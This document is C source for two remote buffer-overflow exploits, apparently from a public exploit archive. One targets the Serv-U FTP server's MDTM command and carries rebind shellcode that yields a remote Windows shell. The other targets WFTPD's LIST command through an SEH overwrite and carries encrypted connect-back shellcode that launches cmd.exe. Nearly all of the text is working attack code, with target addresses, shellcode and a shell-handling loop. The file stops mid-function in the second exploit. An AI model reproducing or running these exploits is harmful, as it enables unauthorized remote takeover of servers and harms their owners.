/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* BUG find by bkbll ([email protected]), cool! :ppPPppPPPpp :D
*
* code by Sam and 2004/01/07
* <[email protected]>
* <[email protected]>
*
*
* Revise History:
* 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.
* 2004/01/09 connect back shellcode added :)
* 2004/01/08 21:04 upgrade now :), we put shellcode in file parameter
* we can attack pacthed serv-U;PPPp by airsupply
* 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now
* :D thx airsupply
*
* Compile: gcc -o ex_servu ex_servu.c
*
* how works?
* [root@core exp]# ./sv -h 192.168.10.119 -t 3
* Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit
* bug find by bkbll ([email protected]) code by Sam ([email protected])
*
* # Connecting......
* [+] Connected.
* USER ftp .
* 10 bytes send.
* PASS sst@SERV-u .
* 17 bytes send.
* [+] login success .
* [+] remote version: Serv-U v4.x with Windows XP EN SP1
* [+] trigger vulnerability !
* [+] 1027 bytes overflow strings sent!
* [+] successed!!
*
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* [Sam Chen@SAM C:\]#
*
*
* some thanks/greets to:
* bkbll (he find this bug :D), airsupply, kkqq, icbm
* and everyone else who's KNOW SST;P
* http://0x557.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
#define VER "v5.0"
#define clearbit(buff) bzero(buff, sizeof (buff));
#define padding(buff, a) memset(buff, a, sizeof (buff));
#define MAX_LEN 2048
#define MAX_NUM 4
int x = 0, port = 21, shellport;
char pass[20], user[20];
struct archs {
char *desc;
unsigned int magic;
}architectures[] = {
{
"Serv-U v3.x/4.x/5.x with Windows 2K CN", //winmm.dll
0x77535985
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version", //winmm.dll
0x77531790
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K EN",
0x77575985
},
{
"Serv-U v3.x/4.x/5.x with Windows XP CN SP1",
0x76b12f69
},
{
"Serv-U v3.x/4.x/5.x with Windows XP EN SP1",
0x76b42a3a
}
};
char decoder [] =
/* 36 bytes cool decoder by airsupply :) */
"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\x46\x BF\x52\x52\x31"
"\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x 73\xFC\x75\xF7"
"\xFF\xD3\x90\x90";
/* fork + rebind shellcode by airsupply (one way shellcode) */
char shellcode [] =
"\x53\x52\x49\x41"
/*port offset 120 + 4*/
"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\x85\x 12\x99\x12\xD9"
"\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\x32\x 70\x8B\x9B\x99"
"\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\x98\x 99\x99\xF1\xF5"
"\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\xAB\x C6\xCD\x66\xCC"
"\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\x98\x 99\x99\x12\x6C"
"\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\x99\x 99\xCD\xF1\x98"
"\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\xC9\x D9\xC9\x66\xCF"
"\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\x55\x CA\xC8\xF3\x8F"
"\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\xCE\x CA\x66\xCF\xA1"
"\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\x98\x 99\x99\xF1\xFC"
"\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98\x 99\x99\x1A\x75"
"\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x 7B\x64\x5F\xDD"
"\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\x CD\xBD\xD1\x10"
"\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\x14\x 27\xDD\x98\x99"
"\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\x 2F\xA9\x98\x99"
"\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\x95\x CA\xCC\xCF\xCE"
"\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x 4C\x12\xD3\x81"
"\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\x9A\x 6C\xAA\x66\x65"
"\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\x61\x 72\x6B\xA2\xE5"
"\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\x D2\x12\xC3\x85"
"\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\x5B\x 9D\x99\xC8\x66"
"\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\x5D\x 9D\xC0\x32\x7B"
"\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x 10\x3F\xA9\x98"
"\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x 1A\x58\x8C\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\x DD\xBD\xA4\x10"
"\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\x14\x DD\xBD\x89\x14"
"\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\xC8\x C8\xC8\x66\x2F"
"\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\x9D\x 99\x99\xF1\x9E"
"\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\xCF\x 89\xF3\xD9\xF1"
"\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\x66\x 2F\xDD\x98\x99"
"\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\x10\x 1D\xBD\x2D\x99"
"\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\x62\x 09\x09\x09\x09"
"\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\x89\x 99\x99\xC8\xC9"
"\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\x2F\x D1\x98\x99\x99"
"\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\xB9\x AA\x59\xD1\xC9"
"\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\x95\x 50\x25\x3F\xF2"
"\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\x76\x C1\x96\xD8\x0E"
"\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\xD6\x A4\xF3\x2D\x19"
"\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\xD2\x 28\x87\x0E\x98"
"\x06\x06\x06\x06"
"\x53\x52\x31\x41";
/* new:
* tcp connect with no block socket, host to ip.
* millisecond timeout, it's will be fast.
*;D
* 2003/06/23 add by Sam
*/
int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
{
int sock,
flag,
pe = 0;
size_t pe_len;
struct timeval tv;
struct sockaddr_in addr;
struct hostent* hp = NULL;
fd_set rset;
// reslov hosts
hp = gethostbyname (host);
if (NULL == hp) {
perror ("tcpConnect:gethostbyname\n");
return -1;
}
sock = socket (AF_INET, SOCK_STREAM, 0);
if (-1 == sock) {
perror ("tcpConnect:socket\n");
return -1;
}
addr.sin_addr = *(struct in_addr *) hp->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
/* set socket no block
*/
flag = fcntl (sock, F_GETFL);
if (-1 == flag) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
flag |= O_NONBLOCK;
if (fcntl (sock, F_SETFL, flag) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
if (connect (sock, (const struct sockaddr *) &addr,
sizeof(addr)) < 0 &&
errno != EINPROGRESS) {
perror ("tcpConnect:connect\n");
close (sock);
return -1;
}
/* set connect timeout
* use millisecond
*/
tv.tv_sec = timeout/1000;
tv.tv_usec = timeout%1000;
FD_ZERO (&rset);
FD_SET (sock, &rset);
if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
// perror ("tcpConnect:select");
close (sock);
return -1;
}
pe_len = sizeof (pe);
if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
perror ("tcpConnect:getsockopt\n");
close (sock);
return -1;
}
if (pe != 0) {
errno = pe;
close (sock);
return -1;
}
if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
pe = 1;
pe_len = sizeof (pe);
if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
perror ("tcpConnect:setsockopt\n");
close (sock);
return -1;
}
return sock;
}
/* rip code, from hsj */
int sh (int in, int out, int s)
{
char sbuf[128], rbuf[128];
int i,
ti, fd_cnt,
ret=0, slen=0, rlen=0;
fd_set rd, wr;
fd_cnt = in > out ? in : out;
fd_cnt = s > fd_cnt ? s : fd_cnt;
fd_cnt ++;
for (;;) {
FD_ZERO (&rd);
if (rlen < sizeof (rbuf))
FD_SET (s, &rd);
if (slen < sizeof (sbuf))
FD_SET (in, &rd);
FD_ZERO (&wr);
if (slen)
FD_SET (s, &wr);
if (rlen)
FD_SET (out, &wr);
if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1))
break;
if (FD_ISSET (in, &rd)) {
if((i = read (in, (sbuf+slen),
(sizeof (sbuf) - slen))) == (-1)) {
ret = -2;
break;
}
else if (i == 0) {
ret = -3;
break;
}
slen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (s, &wr)) {
if ((i = write (s, sbuf, slen)) == (-1))
break;
if (i == slen)
slen = 0;
else {
slen -= i;
memmove (sbuf, sbuf + i, slen);
}
if (!(--ti))
continue;
}
if (FD_ISSET (s, &rd)) {
if ((i = read (s, (rbuf + rlen),
(sizeof (rbuf) - rlen))) <= 0)
break;
rlen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (out, &wr)) {
if ((i = write (out, rbuf, rlen)) == (-1))
break;
if (i == rlen)
rlen = 0;
else {
rlen -= i;
memmove (rbuf, rbuf+i, rlen);
}
}
}
return ret;
}
int new_send (int fd, char *buff, size_t len)
{
int ret;
if ((ret = send (fd, buff, len, 0)) <= 0) {
perror ("new_write");
return -1;
}
return ret;
}
int new_recv (int fd, char *buff, size_t len)
{
int ret;
if ((ret = recv (fd, buff, len, 0)) <= 0) {
perror ("new_recv");
return -1;
}
return ret;
}
int ftp_login (char *hostName, short port, char *user, char *pass)
{
int ret, sock;
char buff[MAX_LEN];
fprintf (stderr, "# Connecting...... \n");
if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {
fprintf (stderr, "[-] failed. \n");
return -1;
}
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "220")) {
fprintf (stderr, "[-] failed. \n");
return -1;
}
fprintf (stderr, "[+] Connected. \n");
sleep (1);
fprintf (stderr, " USER %s .\n", user);
clearbit (buff);
snprintf (buff, sizeof (buff), "USER %s\r\n", user);
ret = new_send (sock, buff, strlen (buff));
fprintf (stderr, " %d bytes send. \n", ret);
sleep (1);
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "331")) {
fprintf (stderr, "[-] user failed. \n%s\n", buff);
return -1;
}
fprintf (stderr, " PASS %s .\n", pass);
clearbit (buff);
snprintf (buff, sizeof (buff), "PASS %s\r\n", pass);
ret = new_send (sock, buff, strlen (buff));
fprintf (stderr, " %d bytes send. \n", ret);
sleep (1);
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "230")) {
fprintf (stderr, "[-] pass failed. \n%s\n", buff);
return -1;
}
fprintf (stderr, "[+] login success .\n");
return sock;
}
void do_overflow (int sock)
{
int ret, i;
unsigned short newport;
char Comand [MAX_LEN] = {0}, chmodBuffer [600], rbuf[256];
clearbit (Comand);
clearbit (rbuf);
clearbit (chmodBuffer);
for(i = 0; i < 47; i++)
strcat(chmodBuffer, "a");
for(i = 0; i < 16; i += 8) {
*(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;
*(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78; //pop reg pop reg ret
}
newport = htons (shellport)^(unsigned short)0x9999;
memcpy (&shellcode[120 + 4], &newport, 2);
strcat(chmodBuffer, decoder);
fprintf (stderr, "[+] remote version: %s\n", architectures[x].desc);
fprintf (stderr, "[+] trigger vulnerability !\n ");
strcpy (Comand, "MDTM 20031111111111+");
strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);
strcat (Comand, " ");
strcat (Comand, shellcode);
strcat (Comand, "hacked_by.sst\r\n");
ret = new_send (sock, Comand, strlen (Comand));
fprintf (stderr, "[+] %d bytes overflow strings sent!\n", ret);
return;
}
/* print help messages.
* just show ya how to use.
*/
void showHELP (char *p)
{
int i;
fprintf (stderr, "Usage: %s [Options] \n", p);
fprintf (stderr, "Options:\n"
"\t-h [remote host]\tremote host\n"
"\t-P [server port]\tserver port\n"
"\t-t [system type]\tchoice the system type\n"
"\t-u [user name]\tlogin with this username\n"
"\t-p [pass word]\tlogin with this passwd\n"
"\t-d [shell port]\trebind using this port (default: ftpd port)\n\n");
printf ("num . description\n");
printf ("----+-----------------------------------------------"
"--------\n");
for (i = 0; i <= MAX_NUM; i ++) {
printf ("%3d | %s\n", i, architectures[i].desc);
}
printf (" '\n");
return;
}
int main (int c, char *v[])
{
int ch, fd, sd;
char *hostName = NULL, *userName = "ftp", *passWord = "sst@SERV-u";
shellport = port;
fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
"bug find by bkbll ([email protected]) code by Sam ([email protected])\n\n");
if (c < 2) {
showHELP (v[0]);
exit (1);
}
while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
switch(ch) {
case 'h':
hostName = optarg;
break;
case 't':
x = atoi (optarg);
if (x > MAX_NUM) {
printf ("[-] wtf your input?\n");
exit (-1);
}
break;
case 'u':
userName = optarg;
break;
case 'p':
passWord = optarg;
break;
case 'P':
port = atoi (optarg);
break;
case 'd':
shellport = atoi (optarg);
break;
default:
showHELP (v[0]);
return 0;
}
}
fd = ftp_login (hostName, port, userName, passWord);
if (fd <= 0) {
printf ("[-] can't connnect\n");
exit (-1);
}
do_overflow (fd);
close (fd);
sleep (3);
sd = new_tcpConnect (hostName, shellport, 3000);
if (sd <= 0) {
printf ("[-] failed\n");
return -1;
}
fprintf (stderr, "[+] successed!!\n\n\n");
sh (0, 1, sd);
close (sd);
return 0;
}
// [2004-02-27]
21 WFTPD Server <= 3.21 Remote Buffer Overflow Exploit
/*
* WFTPD buffer overflow exploit, (c) axl 2004, [email protected]
* Discovered by the very same guy :p
*
* Tested WFTPD versions:
*
* - WFTPD Pro Server 3.21 Release 1 (trial) (latest version)
* - WFTPD Pro Server 3.20 Release 2 (trial)
* - WFTPD Server 3.21 Release 1 (trial) (latest version)
* - WFTPD Server 3.10 Release 1 (trial)
*
* Tested exploit with these remote operating systems:
*
* - Windows XP Pro, SP1
*
* Should be very easy to support other Windows OSes. You may only have
* to update ret_addr.
*/
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <windows.h>
#include <stdio.h>
#define MAXLINE 0x1000
//#define OLDCODE // Try not to uncomment this...
#ifdef OLDCODE
static char* ret_addr = "\xAC\x9C\xEC\x77";
// kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret
#else
/* See the comment in exploit() for the reasons I chose this address */
static char* ret_addr = "\x5B\xC0\xEB\x77";
// kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret
#endif
const unsigned int shlc_offs_enckey = 0x00000025;
const unsigned int shlc_offs_encstart = 0x0000002B;
const unsigned int shlc_offs_encend = 0x000001B8;
unsigned char shlc_code[] =
"\xEB\x16\x78\x56\x34\x12\x78\x56\x34\x12\x78\x56\x 34\x12\x78\x56"
"\x34\x12\x5B\x53\x83\xEB\x1D\xC3\xE8\xF5\xFF\xFF\x FF\x33\xC9\xB1"
"\x64\x81\x74\x8B\x27\x55\x55\x55\x55\xE2\xF6\xFC\x 8B\x43\x0A\x31"
"\x43\x02\x8B\x43\x0E\x31\x43\x06\x89\x4B\x0A\x89\x 4B\x0E\x64\x8B"
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\xAD\x 8B\x68\x08\x8D"
"\x83\x67\x01\x00\x00\x55\xE8\xB7\x00\x00\x00\x68\x 33\x32\x00\x00"
"\x68\x77\x73\x32\x5F\x54\xFF\xD0\x96\x8D\x83\x74\x 01\x00\x00\x56"
"\xE8\x9D\x00\x00\x00\x81\xEC\x90\x01\x00\x00\x54\x 68\x01\x01\x00"
"\x00\xFF\xD0\x8D\x83\x7F\x01\x00\x00\x56\xE8\x83\x 00\x00\x00\x33"
"\xC9\x51\x51\x51\x6A\x06\x6A\x01\x6A\x02\xFF\xD0\x 97\x8D\x83\x8A"
"\x01\x00\x00\x56\xE8\x69\x00\x00\x00\x33\xC9\x51\x 51\x51\x51\x6A"
"\x10\x8D\x4B\x02\x51\x57\xFF\xD0\xB9\x54\x00\x00\x 00\x2B\xE1\x88"
"\x6C\x0C\xFF\xE2\xFA\xC6\x44\x24\x10\x44\x41\x88\x 4C\x24\x3C\x88"
"\x4C\x24\x3D\x89\x7C\x24\x48\x89\x7C\x24\x4C\x89\x 7C\x24\x50\x49"
"\x8D\x44\x24\x10\x54\x50\x51\x51\x51\x6A\x01\x51\x 51\x8D\x83\xA4"
"\x01\x00\x00\x50\x51\x8D\x83\x95\x01\x00\x00\x55\x E8\x11\x00\x00"
"\x00\x59\xFF\xD0\x8D\x83\xAC\x01\x00\x00\x55\xE8\x 02\x00\x00\x00"
"\xFF\xD0\x60\x8B\x7C\x24\x24\x8D\x6F\x78\x03\x6F\x 3C\x8B\x6D\x00"
"\x03\xEF\x83\xC9\xFF\x41\x3B\x4D\x18\x72\x0B\x64\x 89\x0D\x00\x00"
"\x00\x00\x8B\xE1\xFF\xE4\x8B\x5D\x20\x03\xDF\x8B\x 1C\x8B\x03\xDF"
"\x8B\x74\x24\x1C\xAC\x38\x03\x75\xDC\x43\x84\xC0\x 75\xF6\x8B\x5D"
"\x24\x03\xDF\x0F\xB7\x0C\x4B\x8B\x5D\x1C\x03\xDF\x 8B\x0C\x8B\x03"
"\xCF\x89\x4C\x24\x1C\x61\xC3\x4C\x6F\x61\x64\x4C\x 69\x62\x72\x61"
"\x72\x79\x41\x00\x57\x53\x41\x53\x74\x61\x72\x74\x 75\x70\x00\x57"
"\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x57\x53\x 41\x43\x6F\x6E"
"\x6E\x65\x63\x74\x00\x43\x72\x65\x61\x74\x65\x50\x 72\x6F\x63\x65"
"\x73\x73\x41\x00\x63\x6D\x64\x2E\x65\x78\x65\x00\x 45\x78\x69\x74"
"\x50\x72\x6F\x63\x65\x73\x73\x00";
static char inbuf[MAXLINE];
static unsigned inoffs = 0;
const WFTPD_PRO_321_TRIAL = 0; // WFTPD Pro Server 3.21 Release 1 (trial)
const WFTPD_PRO_320_TRIAL = 1; // WFTPD Pro Server 3.20 Release 2 (trial)
const WFTPD_321_TRIAL = 2; // WFTPD Server 3.21 Release 1 (trial)
const WFTPD_310_TRIAL = 3; // WFTPD Server 3.10 Release 1 (trial)
int ftpver = WFTPD_PRO_321_TRIAL;
int isrd(SOCKET s)
{
fd_set r;
FD_ZERO(&r);
FD_SET(s, &r);
timeval t = {0, 0};
int ret = select(1, &r, NULL, NULL, &t);
if (ret < 0)
return 0;
else
return ret != 0;
}
int get_line(SOCKET s, char* string, unsigned len)
{
char* nl;
while ((nl = (char*)memchr(inbuf, '\n', inoffs)) == NULL)
{
if (inoffs >= sizeof(inbuf))
{
printf("[-] Too long line\n");
return 0;
}
int len = recv(s, &inbuf[inoffs], sizeof(inbuf) - inoffs, 0);
if (len <= 0)
{
printf("[-] Error receiving data\n");
return 0;
}
inoffs += len;
}
unsigned nlidx = (unsigned)(ULONG_PTR)(nl - inbuf);
if (nlidx >= len)
{
printf("[-] Too small caller buffer\n");
return 0;
}
memcpy(string, inbuf, nlidx);
string[nlidx] = 0;
if (nlidx > 0 && string[nlidx-1] == '\r')
string[nlidx-1] = 0;
if (nlidx + 1 >= inoffs)
inoffs = 0;
else
{
memcpy(inbuf, &inbuf[nlidx+1], inoffs - (nlidx + 1));
inoffs -= nlidx + 1;
}
return 1;
}
int ignorerd(SOCKET s)
{
inoffs = 0;
while (1)
{
if (!isrd(s))
return 1;
if (recv(s, inbuf, sizeof(inbuf), 0) < 0)
return 0;
}
}
int get_reply_code(SOCKET s)
{
char line[MAXLINE];
if (!get_line(s, line, sizeof(line)))
{
printf("[-] Could not get status code\n");
return -1;
}
char c = line[3];
line[3] = 0;
int code;
if (!(c == ' ' || c == '-') || strlen(line) != 3 || !(code = atoi(line)))
{
printf("[-] Weird reply\n");
return -1;
}
char endline[4];
memcpy(endline, line, 3);
endline[3] = ' ';
if (c == '-')
{
while (1)
{
if (!get_line(s, line, sizeof(line)))
{
printf("[-] Could not get next line\n");
return -1;
}
if (!memcmp(line, endline, sizeof(endline)))
break;
}
}
return code;
}
int sendb(SOCKET s, const char* buf, int len, int flags)
{
while (len)
{
int l = send(s, buf, len, flags);
if (l <= 0)
break;
len -= l;
buf += l;
}
return len == 0;
}
int sends(SOCKET s, const char* buf, int flags)
{
return sendb(s, buf, (int)strlen(buf), flags);
}
int is_valid_char(char c)
{
return c != 0 && c != '\n' && c != ' ';
}
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen)
{
if (dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs)
{
printf("[-] Buffer overflow ;)\n");
return 0;
}
memcpy((char*)dst+dstoffs, src, srclen);
dstoffs += srclen;
return 1;
}
int check_invd_bytes(const char* name, const void* buf, int buflen)
{
const char* b = (const char*)buf;
for (int i = 0; i < buflen; i++)
{
if (!is_valid_char(b[i]))
{
printf("[-] %s[%u] (%02X) cannot contain bytes 00h, 0Ah, or 20h\n", name, i, b[i]);
return 0;
}
}
return 1;
}
int enc_byte(char& c, char& k)
{
for (int i = 0; i < 0x100; i++)
{
if (!is_valid_char(c ^ i) || !is_valid_char(i))
continue;
c ^= i;
k = i;
return 1;
}
printf("[-] Could not find encryption key for byte %02X\n", c);
return 0;
}
int get_enc_key(char* buf, int size, int offs, int step)
{
for (int i = 0; i < 0x100; i++)
{
if (!is_valid_char(i))
continue;
for (int j = offs; j < size; j += step)
{
if (!is_valid_char(buf[j] ^ i))
break;
}
if (j < size)
continue;
return i;
}
printf("[-] Could not find an encryption key\n");
return -1;
}
int exploit(SOCKET s, unsigned long sip, unsigned short sport)
{
printf("[+] Trying buffer overflow + using SEH handler\n");
int ret = 0;
char* shellcode = NULL;
__try
{
shellcode = new char[sizeof(shlc_code)-1];
memcpy(shellcode, shlc_code, sizeof(shlc_code)-1);
shellcode[2] = (char)AF_INET;
shellcode[3] = (char)(AF_INET >> 8);
shellcode[4] = (char)(sport >> 8);
shellcode[5] = (char)sport;
shellcode[6] = (char)(sip >> 24);
shellcode[7] = (char)(sip >> 16);
shellcode[8] = (char)(sip >> 8);
shellcode[9] = (char)sip;
for (int i = 0; i < 8; i++)
{
if (!enc_byte(shellcode[2+i], shellcode[2+8+i]))
__leave;
}
for (int i = 0; i < 4; i++)
{
int k = get_enc_key(&shellcode[shlc_offs_encstart], shlc_offs_encend-shlc_offs_encstart, i, 4);
if (k < 0)
__leave;
shellcode[shlc_offs_enckey+i] = k;
}
printf("[+] Shellcode encryption key = %02X%02X%02X%02X\n", shellcode[shlc_offs_enckey+3],
shellcode[shlc_offs_enckey+2], shellcode[shlc_offs_enckey+1], shellcode[shlc_offs_enckey]);
for (int i = 0; i < shlc_offs_encend-shlc_offs_encstart; i++)
shellcode[shlc_offs_encstart+i] ^= shellcode[shlc_offs_enckey + i % 4];
if (!ignorerd(s))
__leave;
char sndbuf[0x1000];
int sndbufidx = 0;
char* badval = "\x01\xFF\x02\xFE";
const char* ftp_cmd = "LIST -";
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ftp_cmd, (int)strlen(ftp_cmd))) // req
__leave;
switch (ftpver)
{
#ifdef OLDCODE
case WFTPD_310_TRIAL: // doesn't save EBP on the stack
case WFTPD_321_TRIAL: // doesn't save EBP on the stack
case WFTPD_PRO_320_TRIAL:
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0]
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // trylevel
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // old EBP
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // ret addr
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg1
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg2
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg3
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg4
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg5
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4)) // arg6
__leave;
break;
case WFTPD_PRO_321_TRIAL:
default:
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // cookie
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0]
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // trylevel
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // old EBP
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // ret addr
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg1
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg2
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg3
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg4
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg5
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4)) // arg6
__leave;
break;
#else
case WFTPD_310_TRIAL: // doesn't save EBP on the stack
case WFTPD_321_TRIAL: // doesn't save EBP on the stack
case WFTPD_PRO_320_TRIAL:
case WFTPD_PRO_321_TRIAL: // pushes a cookie after old fs:[0]
default:
/*
* WFTPD Pro Server 3.21 saves a cookie so that the stack layout isn't the same as the
* other versions. However, with the right exception address, we can make it work.
* 77EBC05B = kernel32.dll => POP REG / POP REG / RET. This is the exception handler
* the older versions will execute. WFTPD Pro Server 3.21 will instead execute the
* instructions with the bytes in that same address. In this case, it'll execute these
* instructions:
* 5B POP EBX
* C0EB 77 SHR BL,77
* 5B POP EBX
* C0EB 77 SHR BL,77
* EB 1E JMP SHORT ourcode
*/
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0] OR cookie (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler OR old fs:[0] (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // trylevel OR exception handler (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\xEB\x1E\xFE\xFF", 4) || // (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
